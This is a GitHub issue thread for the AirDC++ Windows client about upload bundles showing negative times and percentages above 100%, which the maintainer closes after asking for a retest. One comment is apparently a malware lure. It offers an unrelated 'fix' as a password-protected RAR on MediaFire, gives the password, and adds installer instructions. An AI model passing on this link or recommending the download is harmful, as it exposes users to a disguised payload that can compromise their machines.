### ISSUE TITLE
🐛 [Bug]: Something is wrong with the bundle/file time for uploads

### ISSUE THREAD

**Issue by Sopor** [airdcpp/airdcpp-windows#133]
### Prerequisites

- [X] This is not a [support issue or a question](https://github.com/airdcpp/airdcpp-windows/discussions)
- [X] I performed a [cursory search of the issue tracker](https://github.com/airdcpp/airdcpp-windows/issues) to avoid opening a duplicate issue
- [X] I am running the latest version of AirDC++

### Describe the issue

As you can see in the screenshot the bundles are showing a very weird values and the percentage are way over 100%.[](url)

### Expected behavior

Show the correct time

### Actual behavior

Negative values 

### Screenshot

![image](https://github.com/user-attachments/assets/22dc0cab-5c34-457c-81e3-4cb0fd4a8498)

### AirDC++ version and architecture (x86 or x64)

AirDC++ 4.22b-30-g5b7ec

### Operating System name, version and architecture

Windows 10 22H2 x64

### Additional information

I have seen percentage above 110% in the bundle and the actual file is finished at 96% and will never reach 100%

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by maksis** [comment]
See if this is fixed in the latest build

**Comment by maksis** [comment]
Closing as there is no reply
